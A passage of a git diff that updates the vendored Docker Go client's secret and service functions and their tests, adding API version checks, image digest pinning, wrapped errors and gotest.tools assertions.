*testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, err := client.SecretList(context.Background(), types.SecretListOptions{}) @@ -27,7 +39,7 @@ func TestSecretListError(t *testing.T) { } func TestSecretList(t *testing.T) { - expectedURL := "/secrets" + expectedURL := "/v1.25/secrets" filters := filters.NewArgs() filters.Add("label", "label1") @@ -54,6 +66,7 @@ func TestSecretList(t *testing.T) { } for _, listCase := range listCases { client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/secret_remove.go b/vendor/github.com/docker/docker/client/secret_remove.go index 1955b988a9..e9d5218293 100644 --- a/vendor/github.com/docker/docker/client/secret_remove.go +++ b/vendor/github.com/docker/docker/client/secret_remove.go @@ -1,10 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // SecretRemove removes a Secret. func (cli *Client) SecretRemove(ctx context.Context, id string) error { + if err := cli.NewVersionError("1.25", "secret remove"); err != nil { + return err + } resp, err := cli.delete(ctx, "/secrets/"+id, nil, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "secret", id) } diff --git a/vendor/github.com/docker/docker/client/secret_remove_test.go b/vendor/github.com/docker/docker/client/secret_remove_test.go index f269f787d2..bdfccf6be8 100644 --- a/vendor/github.com/docker/docker/client/secret_remove_test.go +++ b/vendor/github.com/docker/docker/client/secret_remove_test.go @@ -1,19 +1,31 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretRemoveUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + err := client.SecretRemove(context.Background(), "secret_id") + assert.Check(t, is.Error(err, `"secret remove" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretRemoveError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } err := client.SecretRemove(context.Background(), "secret_id") @@ -23,9 +35,10 @@ func TestSecretRemoveError(t *testing.T) { } func TestSecretRemove(t *testing.T) { - expectedURL := "/secrets/secret_id" + expectedURL := "/v1.25/secrets/secret_id" client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/secret_update.go b/vendor/github.com/docker/docker/client/secret_update.go index b94e24aab0..164256bbc1 100644 --- a/vendor/github.com/docker/docker/client/secret_update.go +++ b/vendor/github.com/docker/docker/client/secret_update.go @@ -1,16 +1,18 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "strconv" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SecretUpdate updates a Secret. Currently, the only part of a secret spec -// which can be updated is Labels. +// SecretUpdate attempts to update a Secret func (cli *Client) SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error { + if err := cli.NewVersionError("1.25", "secret update"); err != nil { + return err + } query := url.Values{} query.Set("version", strconv.FormatUint(version.Index, 10)) resp, err := cli.post(ctx, "/secrets/"+id+"/update", query, secret, nil) diff --git a/vendor/github.com/docker/docker/client/secret_update_test.go b/vendor/github.com/docker/docker/client/secret_update_test.go index c620985bd5..c7670b440c 100644 --- a/vendor/github.com/docker/docker/client/secret_update_test.go +++ b/vendor/github.com/docker/docker/client/secret_update_test.go @@ -1,21 +1,32 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretUpdateUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{}) + assert.Check(t, is.Error(err, `"secret update" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretUpdateError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{}) @@ -25,9 +36,10 @@ func TestSecretUpdateError(t *testing.T) { } func TestSecretUpdate(t *testing.T) { - expectedURL := "/secrets/secret_id/update" + expectedURL := "/v1.25/secrets/secret_id/update" client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/service_create.go b/vendor/github.com/docker/docker/client/service_create.go index 3d1be225bd..8fadda4a90 100644 --- a/vendor/github.com/docker/docker/client/service_create.go +++ b/vendor/github.com/docker/docker/client/service_create.go @@ -1,23 +1,75 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" + "fmt" + "strings" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" ) // ServiceCreate creates a new Service. func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) { - var headers map[string][]string + var distErr error + + headers := map[string][]string{ + "version": {cli.version}, + } if options.EncodedRegistryAuth != "" { - headers = map[string][]string{ - "X-Registry-Auth": {options.EncodedRegistryAuth}, + headers["X-Registry-Auth"] = []string{options.EncodedRegistryAuth} + } + + // Make sure containerSpec is not nil when no runtime is set or the runtime is set to container + if service.TaskTemplate.ContainerSpec == nil && (service.TaskTemplate.Runtime == "" || service.TaskTemplate.Runtime == swarm.RuntimeContainer) { + service.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{} + } + + if err := validateServiceSpec(service); err != nil { + return types.ServiceCreateResponse{}, err + } + + // ensure that the image is tagged + var imgPlatforms []swarm.Platform + if service.TaskTemplate.ContainerSpec != nil { + if taggedImg := imageWithTagString(service.TaskTemplate.ContainerSpec.Image); taggedImg != "" { + service.TaskTemplate.ContainerSpec.Image = taggedImg + } + if options.QueryRegistry { + var img string + img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.ContainerSpec.Image, options.EncodedRegistryAuth) + if img != "" { + service.TaskTemplate.ContainerSpec.Image = img + } } } + // ensure that the image is tagged + if service.TaskTemplate.PluginSpec != nil { + if taggedImg := imageWithTagString(service.TaskTemplate.PluginSpec.Remote); taggedImg != "" { + service.TaskTemplate.PluginSpec.Remote = taggedImg + } + if options.QueryRegistry { + var img string + img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.PluginSpec.Remote, options.EncodedRegistryAuth) + if img != "" { + service.TaskTemplate.PluginSpec.Remote = img + } + } + } + + if service.TaskTemplate.Placement == nil && len(imgPlatforms) > 0 { + service.TaskTemplate.Placement = &swarm.Placement{} + } + if len(imgPlatforms) > 0 { + service.TaskTemplate.Placement.Platforms = imgPlatforms + } + var response types.ServiceCreateResponse resp, err := cli.post(ctx, "/services/create", nil, service, headers) if err != nil { @@ -25,6 +77,90 @@ func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec, } err = json.NewDecoder(resp.body).Decode(&response) + + if distErr != nil { + response.Warnings = append(response.Warnings, digestWarning(service.TaskTemplate.ContainerSpec.Image)) + } + ensureReaderClosed(resp) return response, err } + +func imageDigestAndPlatforms(ctx context.Context, cli DistributionAPIClient, image, encodedAuth string) (string, []swarm.Platform, error) { + distributionInspect, err := cli.DistributionInspect(ctx, image, encodedAuth) + var platforms []swarm.Platform + if err != nil { + return "", nil, err + } + + imageWithDigest := imageWithDigestString(image, distributionInspect.Descriptor.Digest) + + if len(distributionInspect.Platforms) > 0 { + platforms = make([]swarm.Platform, 0, len(distributionInspect.Platforms)) + for _, p := range distributionInspect.Platforms { + // clear architecture field for arm. This is a temporary patch to address + // https://github.com/docker/swarmkit/issues/2294. The issue is that while + // image manifests report "arm" as the architecture, the node reports + // something like "armv7l" (includes the variant), which causes arm images + // to stop working with swarm mode. This patch removes the architecture + // constraint for arm images to ensure tasks get scheduled. + arch := p.Architecture + if strings.ToLower(arch) == "arm" { + arch = "" + } + platforms = append(platforms, swarm.Platform{ + Architecture: arch, + OS: p.OS, + }) + } + } + return imageWithDigest, platforms, err +} + +// imageWithDigestString takes an image string and a digest, and updates +// the image string if it didn't originally contain a digest. It returns +// an empty string if there are no updates. +func imageWithDigestString(image string, dgst digest.Digest) string { + namedRef, err := reference.ParseNormalizedNamed(image) + if err == nil { + if _, isCanonical := namedRef.(reference.Canonical); !isCanonical { + // ensure that image gets a default tag if none is provided + img, err := reference.WithDigest(namedRef, dgst) + if err == nil { + return reference.FamiliarString(img) + } + } + } + return "" +} + +// imageWithTagString takes an image string, and returns a tagged image +// string, adding a 'latest' tag if one was not provided. It returns an +// empty string if a canonical reference was provided +func imageWithTagString(image string) string { + namedRef, err := reference.ParseNormalizedNamed(image) + if err == nil { + return reference.FamiliarString(reference.TagNameOnly(namedRef)) + } + return "" +} + +// digestWarning constructs a formatted warning string using the +// image name that could not be pinned by digest. The formatting +// is hardcoded, but could me made smarter in the future +func digestWarning(image string) string { + return fmt.Sprintf("image %s could not be accessed on a registry to record\nits digest. Each node will access %s independently,\npossibly leading to different nodes running different\nversions of the image.\n", image, image) +} + +func validateServiceSpec(s swarm.ServiceSpec) error { + if s.TaskTemplate.ContainerSpec != nil && s.TaskTemplate.PluginSpec != nil { + return errors.New("must not specify both a container spec and a plugin spec in the task template") + } + if s.TaskTemplate.PluginSpec != nil && s.TaskTemplate.Runtime != swarm.RuntimePlugin { + return errors.New("mismatched runtime with plugin spec") + } + if s.TaskTemplate.ContainerSpec != nil && (s.TaskTemplate.Runtime != "" && s.TaskTemplate.Runtime != swarm.RuntimeContainer) { + return errors.New("mismatched runtime with container spec") + } + return nil +} diff --git a/vendor/github.com/docker/docker/client/service_create_test.go b/vendor/github.com/docker/docker/client/service_create_test.go index 1e07382870..9f51c18223 100644 --- a/vendor/github.com/docker/docker/client/service_create_test.go +++ b/vendor/github.com/docker/docker/client/service_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,8 +11,12 @@ import ( "testing" "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + "github.com/opencontainers/image-spec/specs-go/v1" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestServiceCreateError(t *testing.T) { @@ -55,3 +60,152 @@ func TestServiceCreate(t *testing.T) { t.Fatalf("expected `service_id`, got %s", r.ID) } } + +func TestServiceCreateCompatiblePlatforms(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if strings.HasPrefix(req.URL.Path, "/v1.30/services/create") { + var serviceSpec swarm.ServiceSpec + + // check if the /distribution endpoint returned correct output + err := json.NewDecoder(req.Body).Decode(&serviceSpec) + if err != nil { + return nil, err + } + + assert.Check(t, is.Equal("foobar:1.0@sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96", serviceSpec.TaskTemplate.ContainerSpec.Image)) + assert.Check(t, is.Len(serviceSpec.TaskTemplate.Placement.Platforms, 1)) + + p := serviceSpec.TaskTemplate.Placement.Platforms[0] + b, err := json.Marshal(types.ServiceCreateResponse{ + ID: "service_" + p.OS + "_" + p.Architecture, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/") { + b, err := json.Marshal(registrytypes.DistributionInspect{ + Descriptor: v1.Descriptor{ + Digest: "sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96", + }, + Platforms: []v1.Platform{ + { + Architecture: "amd64", + OS: "linux", + }, + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } else { + return nil, fmt.Errorf("unexpected URL '%s'", req.URL.Path) + } + }), + } + + spec := swarm.ServiceSpec{TaskTemplate: swarm.TaskSpec{ContainerSpec: &swarm.ContainerSpec{Image: "foobar:1.0"}}} + + r, err := client.ServiceCreate(context.Background(), spec, types.ServiceCreateOptions{QueryRegistry: true}) + assert.Check(t, err) + assert.Check(t, is.Equal("service_linux_amd64", r.ID)) +} + +func TestServiceCreateDigestPinning(t *testing.T) { + dgst := "sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96" + dgstAlt := "sha256:37ffbf3f7497c07584dc9637ffbf3f7497c0758c0537ffbf3f7497c0c88e2bb7" + serviceCreateImage := "" + pinByDigestTests := []struct { + img string // input image provided by the user + expected string // expected image after digest pinning + }{ + // default registry returns familiar string + {"docker.io/library/alpine", "alpine:latest@" + dgst}, + // provided tag is preserved and digest added + {"alpine:edge", "alpine:edge@" + dgst}, + // image with provided alternative digest remains unchanged + {"alpine@" + dgstAlt, "alpine@" + dgstAlt}, + // image with provided tag and alternative digest remains unchanged + {"alpine:edge@" + dgstAlt, "alpine:edge@" + dgstAlt}, + // image on alternative registry does not result in familiar string + {"alternate.registry/library/alpine", "alternate.registry/library/alpine:latest@" + dgst}, + // unresolvable image does not get a digest + {"cannotresolve", "cannotresolve:latest"}, + } + + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if strings.HasPrefix(req.URL.Path, "/v1.30/services/create") { + // reset and set image received by the service create endpoint + serviceCreateImage = "" + var service swarm.ServiceSpec + if err := json.NewDecoder(req.Body).Decode(&service); err != nil { + return nil, fmt.Errorf("could not parse service create request") + } + serviceCreateImage = service.TaskTemplate.ContainerSpec.Image + + b, err := json.Marshal(types.ServiceCreateResponse{ + ID: "service_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/cannotresolve") { + // unresolvable image + return nil, fmt.Errorf("cannot resolve image") + } else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/") { + // resolvable images + b, err := json.Marshal(registrytypes.DistributionInspect{ + Descriptor: v1.Descriptor{ + Digest: digest.Digest(dgst), + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } + return nil, fmt.Errorf("unexpected URL '%s'", req.URL.Path) + }), + } + + // run pin by digest tests + for _, p := range pinByDigestTests { + r, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{ + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: &swarm.ContainerSpec{ + Image: p.img, + }, + }, + }, types.ServiceCreateOptions{QueryRegistry: true}) + + if err != nil { + t.Fatal(err) + } + + if r.ID != "service_id" { + t.Fatalf("expected `service_id`, got %s", r.ID) + } + + if p.expected != serviceCreateImage { + t.Fatalf("expected image %s, got %s", p.expected, serviceCreateImage) + } + } +} diff --git a/vendor/github.com/docker/docker/client/service_inspect.go b/vendor/github.com/docker/docker/client/service_inspect.go index ca71cbde1a..de6aa22de7 100644 --- a/vendor/github.com/docker/docker/client/service_inspect.go +++ b/vendor/github.com/docker/docker/client/service_inspect.go @@ -1,23 +1,27 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" + "fmt" "io/ioutil" - "net/http" + "net/url" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // ServiceInspectWithRaw returns the service information and the raw data. -func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) { - serverResp, err := cli.get(ctx, "/services/"+serviceID, nil, nil) +func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string, opts types.ServiceInspectOptions) (swarm.Service, []byte, error) { + if serviceID == "" { + return swarm.Service{}, nil, objectNotFoundError{object: "service", id: serviceID} + } + query := url.Values{} + query.Set("insertDefaults", fmt.Sprintf("%v", opts.InsertDefaults)) + serverResp, err := cli.get(ctx, "/services/"+serviceID, query, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return swarm.Service{}, nil, serviceNotFoundError{serviceID} - } - return swarm.Service{}, nil, err + return swarm.Service{}, nil, wrapResponseError(err, serverResp, "service", serviceID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/service_inspect_test.go b/vendor/github.com/docker/docker/client/service_inspect_test.go index e235cf0fef..b69332ccc6 100644 --- a/vendor/github.com/docker/docker/client/service_inspect_test.go +++ b/vendor/github.com/docker/docker/client/service_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,9 @@ import ( "strings" "testing" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestServiceInspectError(t *testing.T) { @@ -18,7 +20,7 @@ func TestServiceInspectError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - _, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing") + _, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing", types.ServiceInspectOptions{}) if err == nil || err.Error() != "Error response from daemon: Server error" { t.Fatalf("expected a Server Error, got %v", err) } @@ -29,9 +31,21 @@ func TestServiceInspectServiceNotFound(t *testing.T) { client: newMockClient(errorMock(http.StatusNotFound, "Server error")), } - _, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown") - if err == nil || !IsErrServiceNotFound(err) { - t.Fatalf("expected an serviceNotFoundError error, got %v", err) + _, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown", types.ServiceInspectOptions{}) + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a serviceNotFoundError error, got %v", err) + } +} + +func TestServiceInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.ServiceInspectWithRaw(context.Background(), "", types.ServiceInspectOptions{}) + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } @@ -55,7 +69,7 @@ func TestServiceInspect(t *testing.T) { }), } - serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id") + serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id", types.ServiceInspectOptions{}) if err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/client/service_list.go b/vendor/github.com/docker/docker/client/service_list.go index c29e6d407d..7d53e2b9b9 100644 --- a/vendor/github.com/docker/docker/client/service_list.go +++ b/vendor/github.com/docker/docker/client/service_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // ServiceList returns the list of services. @@ -15,7 +15,7 @@ func (cli *Client) ServiceList(ctx context.Context, options types.ServiceListOpt query := url.Values{} if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/client/service_list_test.go b/vendor/github.com/docker/docker/client/service_list_test.go index 213981ef70..9903f9e71c 100644 --- a/vendor/github.com/docker/docker/client/service_list_test.go +++ b/vendor/github.com/docker/docker/client/service_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,7 +13,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) func TestServiceListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/service_logs.go b/vendor/github.com/docker/docker/client/service_logs.go index 24384e3ec0..906fd4059e 100644 --- a/vendor/github.com/docker/docker/client/service_logs.go +++ b/vendor/github.com/docker/docker/client/service_logs.go @@ -1,14 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" timetypes "github.com/docker/docker/api/types/time" + "github.com/pkg/errors" ) // ServiceLogs returns the logs generated by a service in an io.ReadCloser. @@ -26,7 +26,7 @@ func (cli *Client) ServiceLogs(ctx context.Context, serviceID string, options ty if options.Since != "" { ts, err := timetypes.GetTimestamp(options.Since, time.Now()) if err != nil { - return nil, err + return nil, errors.Wrap(err, `invalid value for "since"`) } query.Set("since", ts) } diff --git a/vendor/github.com/docker/docker/client/service_logs_test.go b/vendor/github.com/docker/docker/client/service_logs_test.go index a6d002ba75..28f3ab5c6b 100644 --- a/vendor/github.com/docker/docker/client/service_logs_test.go +++ b/vendor/github.com/docker/docker/client/service_logs_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io" "io/ioutil" @@ -13,8 +14,8 @@ import ( "time" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestServiceLogsError(t *testing.T) { @@ -22,15 +23,11 @@ func TestServiceLogsError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, err := client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{}) - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) _, err = client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{ Since: "2006-01-02TZ", }) - if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) { - t.Fatalf("expected a 'parsing time' error, got %v", err) - } + assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`)) } func TestServiceLogs(t *testing.T) { @@ -38,6 +35,7 @@ func TestServiceLogs(t *testing.T) { cases := []struct { options types.ContainerLogsOptions expectedQueryParams map[string]string + expectedError string }{ { expectedQueryParams: map[string]string{ @@ -71,21 +69,27 @@ func TestServiceLogs(t *testing.T) { }, { options: types.ContainerLogsOptions{ - // An complete invalid date, timestamp or go duration will be - // passed as is - Since: "invalid but valid", + // timestamp will be passed as is + Since: "1136073600.000000001", }, expectedQueryParams: map[string]string{ "tail": "", - "since": "invalid but valid", + "since": "1136073600.000000001", }, }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date will not be passed + Since: "invalid value", + }, + expectedError: `invalid value for "since": failed to parse value as time or duration: "invalid value"`, + }, } for _, logCase := range cases { client := &Client{ client: newMockClient(func(r *http.Request) (*http.Response, error) { if !strings.HasPrefix(r.URL.Path, expectedURL) { - return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, r.URL) } // Check query parameters query := r.URL.Query() @@ -102,17 +106,15 @@ func TestServiceLogs(t *testing.T) { }), } body, err := client.ServiceLogs(context.Background(), "service_id", logCase.options) - if err != nil { - t.Fatal(err) + if logCase.expectedError != "" { + assert.Check(t, is.Error(err, logCase.expectedError)) + continue } + assert.NilError(t, err) defer body.Close() content, err := ioutil.ReadAll(body) - if err != nil { - t.Fatal(err) - } - if string(content) != "response" { - t.Fatalf("expected response to contain 'response', got %s", string(content)) - } + assert.NilError(t, err) + assert.Check(t, is.Contains(string(content), "response")) } } diff --git a/vendor/github.com/docker/docker/client/service_remove.go b/vendor/github.com/docker/docker/client/service_remove.go index a9331f92c2..fe3421bec8 100644 --- a/vendor/github.com/docker/docker/client/service_remove.go +++ b/vendor/github.com/docker/docker/client/service_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // ServiceRemove kills and removes a service. func (cli *Client) ServiceRemove(ctx context.Context, serviceID string) error { resp, err := cli.delete(ctx, "/services/"+serviceID, nil, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "service", serviceID) } diff --git a/vendor/github.com/docker/docker/client/service_remove_test.go b/vendor/github.com/docker/docker/client/service_remove_test.go index 8e2ac259c1..d2379a1366 100644 --- a/vendor/github.com/docker/docker/client/service_remove_test.go +++ b/vendor/github.com/docker/docker/client/service_remove_test.go @@ -1,14 +1,16 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestServiceRemoveError(t *testing.T) { @@ -17,9 +19,17 @@ func TestServiceRemoveError(t *testing.T) { } err := client.ServiceRemove(context.Background(), "service_id") - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestServiceRemoveNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "missing")), } + + err := client.ServiceRemove(context.Background(), "service_id") + assert.Check(t, is.Error(err, "Error: No such service: service_id")) + assert.Check(t, IsErrNotFound(err)) } func TestServiceRemove(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/service_update.go b/vendor/github.com/docker/docker/client/service_update.go index afa94d47e2..5a7a61b01f 100644 --- a/vendor/github.com/docker/docker/client/service_update.go +++ b/vendor/github.com/docker/docker/client/service_update.go @@ -1,34 +1,80 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "strconv" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // ServiceUpdate updates a Service. func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) { var ( - headers map[string][]string query = url.Values{} + distErr error ) + headers := map[string][]string{ + "version": {cli.version}, + } + if options.EncodedRegistryAuth != "" { - headers = map[string][]string{ - "X-Registry-Auth": {options.EncodedRegistryAuth}, - } + headers["X-Registry-Auth"] = []string{options.EncodedRegistryAuth} } if options.RegistryAuthFrom != "" { query.Set("registryAuthFrom", options.RegistryAuthFrom) } + if options.Rollback != "" { + query.Set("rollback", options.Rollback) + } + query.Set("version", strconv.FormatUint(version.Index, 10)) + if err := validateServiceSpec(service); err != nil { + return types.ServiceUpdateResponse{}, err + } + + var imgPlatforms []swarm.Platform + // ensure that the image is tagged + if service.TaskTemplate.ContainerSpec != nil { + if taggedImg := imageWithTagString(service.TaskTemplate.ContainerSpec.Image); taggedImg != "" { + service.TaskTemplate.ContainerSpec.Image = taggedImg + } + if options.QueryRegistry { + var img string + img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.ContainerSpec.Image, options.EncodedRegistryAuth) + if img != "" { + service.TaskTemplate.ContainerSpec.Image = img + } + } + } + + // ensure that the image is tagged + if service.TaskTemplate.PluginSpec != nil { + if taggedImg := imageWithTagString(service.TaskTemplate.PluginSpec.Remote); taggedImg != "" { + service.TaskTemplate.PluginSpec.Remote = taggedImg + } + if options.QueryRegistry { + var img string + img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.PluginSpec.Remote, options.EncodedRegistryAuth) + if img != "" { + service.TaskTemplate.PluginSpec.Remote = img + } + } + } + + if service.TaskTemplate.Placement == nil && len(imgPlatforms) > 0 { + service.TaskTemplate.Placement = &swarm.Placement{} + } + if len(imgPlatforms) > 0 { + service.TaskTemplate.Placement.Platforms = imgPlatforms + } + var response types.ServiceUpdateResponse resp, err := cli.post(ctx, "/services/"+serviceID+"/update", query, service, headers) if err != nil { @@ -36,6 +82,11 @@ func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version } err = json.NewDecoder(resp.body).Decode(&response) + + if distErr != nil { + response.Warnings = append(response.Warnings, digestWarning(service.TaskTemplate.ContainerSpec.Image)) + } + ensureReaderClosed(resp) return response, err } diff --git a/vendor/github.com/docker/docker/client/service_update_test.go b/vendor/github.com/docker/docker/client/service_update_test.go index 76bea176bf..9a0a9ce0dd 100644 --- a/vendor/github.com/docker/docker/client/service_update_test.go +++ b/vendor/github.com/docker/docker/client/service_update_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/session.go 